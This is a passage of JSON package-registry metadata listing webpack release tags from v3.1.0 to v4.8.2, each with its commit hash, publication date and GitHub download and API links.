.8.2","sha":"c92eabd3be44d4162be0affc9ef368624b0a6e51","kind":"tag","published_at":"2018-05-11T16:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.2/manifests"},{"name":"v3.12.0","sha":"cce33c206abaeef26d06b62102adf74a989a4696","kind":"tag","published_at":"2018-05-11T14:50:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.12.0/manifests"},{"name":"v4.8.1","sha":"2986ab1a18e895ac3f2546ac0c70bf73c0fdb679","kind":"tag","published_at":"2018-05-07T21:03:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.1/manifests"},{"name":"v4.8.0","sha":"586f9a21768e8bbc6bead6e564a6c7981a42f2d8","kind":"tag","published_at":"2018-05-07T11:39:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.8.0/manifests"},{"name":"v4.7.0","sha":"673c103715b5439bf72ed9767f5189b92ce7d428","kind":"tag","published_at":"2018-05-04T11:57:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.7.0/manifests"},{"name":"v4.6.0","sha":"e7c8fa414b718ac98d94a96e2553faceabfbc92f","kind":"tag","published_at":"2018-04-17T16:23:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.6.0/manifests"},{"name":"v4.5.0","sha":"e400445445a2f91d19aa8c79aa7b34b66011e661","kind":"tag","published_at":"2018-04-04T13:07:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.5.0/manifests"},{"name":"v4.4.1","sha":"0e404b8683d79052e3a6b42743bd3061f17a5a5d","kind":"tag","published_at":"2018-03-29T15:28:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.1/manifests"},{"name":"v4.4.0","sha":"e3bb8c9c8f5a30884b4df01bfbbc772cc1fb8cda","kind":"tag","published_at":"2018-03-29T14:57:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.4.0/manifests"},{"name":"v4.3.0","sha":"54ceb3c04d513ef5c7b78eaf4d391d14cfbe8282","kind":"tag","published_at":"2018-03-27T09:00:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.3.0/manifests"},{"name":"v4.2.0","sha":"d668a23fdc69c61ab80ec8db89a5b49778559534","kind":"tag","published_at":"2018-03-21T08:26:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.2.0/manifests"},{"name":"v4.1.1","sha":"41bb63ad69d0f32c042e74e732cb045b5966c452","kind":"tag","published_at":"2018-03-07T15:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"f916fc0bb70585cf04a92cd99e004e4879f1d337","kind":"tag","published_at":"2018-03-04T10:39:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.1.0/manifests"},{"name":"v4.0.1","sha":"5044762c846a3a83a208853e48785a293fe9ef7d","kind":"tag","published_at":"2018-02-26T20:11:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.1/manifests"},{"name":"v4.0.0","sha":"213226ece261a0e89edb9de15fbc6775418f6041","kind":"tag","published_at":"2018-02-25T02:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0/manifests"},{"name":"v4.0.0-beta.3","sha":"4c25bfbaf2e01cf23708a381319b43367701e5b5","kind":"tag","published_at":"2018-02-24T14:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.3/manifests"},{"name":"v4.0.0-beta.2","sha":"2ad530e4b486c248758f6d9d94070f207ef5f2e9","kind":"tag","published_at":"2018-02-17T13:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.2/manifests"},{"name":"v3.11.0","sha":"bc840ec8747ba19c9e87629f2959ed2e65a9ffbe","kind":"tag","published_at":"2018-02-10T14:37:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.11.0/manifests"},{"name":"v4.0.0-beta.1","sha":"df65475ba32a5881f48ab9d90e1c010ea57c3d65","kind":"tag","published_at":"2018-02-10T14:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.1/manifests"},{"name":"v4.0.0-beta.0","sha":"ae0dc62b7b4cc1ee3170c8ce3dd581ddcfa46a2a","kind":"tag","published_at":"2018-01-24T22:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-beta.0/manifests"},{"name":"v4.0.0-alpha.5","sha":"c302bba6a53601dcab5e86dce5778897710c86e1","kind":"tag","published_at":"2018-01-22T14:19:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.5/manifests"},{"name":"v4.0.0-alpha.4","sha":"37cc6f4f6ec178d0406dcf816de690cab9b1bf8f","kind":"tag","published_at":"2018-01-06T09:46:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"9334fd8547831ded7f11e05319616a72ea0b4698","kind":"tag","published_at":"2018-01-04T21:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"910d6fd40996189ee990fe90c69ab732cbd9963a","kind":"tag","published_at":"2017-12-22T11:49:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.2/manifests"},{"name":"v4.0.0-alpha.1","sha":"9a33e031d16008d690a188a2d784666c8a293b43","kind":"tag","published_at":"2017-12-14T15:08:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.1/manifests"},{"name":"v4.0.0-alpha.0","sha":"fd3c8025e5c32e625f68df2b030646a8c2a8467a","kind":"tag","published_at":"2017-12-04T19:52:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.0.0-alpha.0/manifests"},{"name":"v3.10.0","sha":"c71fd05f98a752753b9450f590c970b76379803d","kind":"tag","published_at":"2017-12-04T18:02:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.10.0/manifests"},{"name":"v3.9.1","sha":"5acbe2f72eaa67654904cf8a127c3ed4da12dc99","kind":"tag","published_at":"2017-11-30T17:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"73e34a7306d40ed95d666058ad03e9c14de554af","kind":"tag","published_at":"2017-11-30T13:53:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.9.0/manifests"},{"name":"v3.8.1","sha":"b8e6b4a100a5d5a6387c276eb52d6c7f20954a0b","kind":"tag","published_at":"2017-10-17T15:20:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.1/manifests"},{"name":"v3.8.0","sha":"1dc561865ad57d9e862832ccf3579f67a8bbba2d","kind":"tag","published_at":"2017-10-17T09:15:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.8.0/manifests"},{"name":"v3.7.1","sha":"ce24e98bc084bf45a271fb05b14b0e9829686149","kind":"tag","published_at":"2017-10-11T19:39:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"551ea76838f163a1e0fbf65182e2ac08d346a1f3","kind":"tag","published_at":"2017-10-11T18:07:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.7.0/manifests"},{"name":"v3.6.0","sha":"622675993d72c6ea7d70cd2e503fd9416f940b2b","kind":"tag","published_at":"2017-09-15T08:45:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.6.0/manifests"},{"name":"v3.5.6","sha":"92d5c209437f9ef9293571e24cc8dcf10459d578","kind":"tag","published_at":"2017-09-06T15:41:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.6","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.6/manifests"},{"name":"v3.5.5","sha":"ef6ab6820a74db730cfec6fd419d2c211d62c0bd","kind":"tag","published_at":"2017-08-16T14:55:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.5","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.5/manifests"},{"name":"v3.5.4","sha":"990563f9a2b3fb3e817b7e1b9d6841bcd1eaa51e","kind":"tag","published_at":"2017-08-12T09:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.4","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.4/manifests"},{"name":"v3.5.3","sha":"4b2b1ad99b86458983714c589c6495772b1292ee","kind":"tag","published_at":"2017-08-10T13:38:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"25302e51a601b4e30a661d788471e4a50b7a9764","kind":"tag","published_at":"2017-08-09T10:51:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"5be959311a746b976a0a56625cc4372307b351ed","kind":"tag","published_at":"2017-08-08T11:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"75a8ffec0a8ab2f1f07a950ee965a31917af5fe9","kind":"tag","published_at":"2017-08-08T08:50:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.5.0/manifests"},{"name":"v3.4.1","sha":"1f064bc84f222305afada087f9631fd7ae39ea30","kind":"tag","published_at":"2017-07-26T08:48:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"c8732c8d157ed56542d521a557dda7ff7ad12ffb","kind":"tag","published_at":"2017-07-25T14:27:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.4.0/manifests"},{"name":"v3.3.0","sha":"5b119e7c5b437fd48e7e681996b9be10cbd6de34","kind":"tag","published_at":"2017-07-15T13:52:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.3.0/manifests"},{"name":"v2.7.0","sha":"eeea490e8ec0e2341cd4bb6da82aabf6ca139322","kind":"tag","published_at":"2017-07-12T07:00:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.7.0/manifests"},{"name":"v3.2.0","sha":"d0059901266e54a22309c419cad6d9327767c5a3","kind":"tag","published_at":"2017-07-11T20:09:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.2.0/manifests"},{"name":"v3.1.0","sha":"4bb3018da4310deaeff52b8a1c2b5645282b9994","kind":"tag","published_at":"2017-07-06T21:57:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v3.1.0","html_url":"https://github.com/webp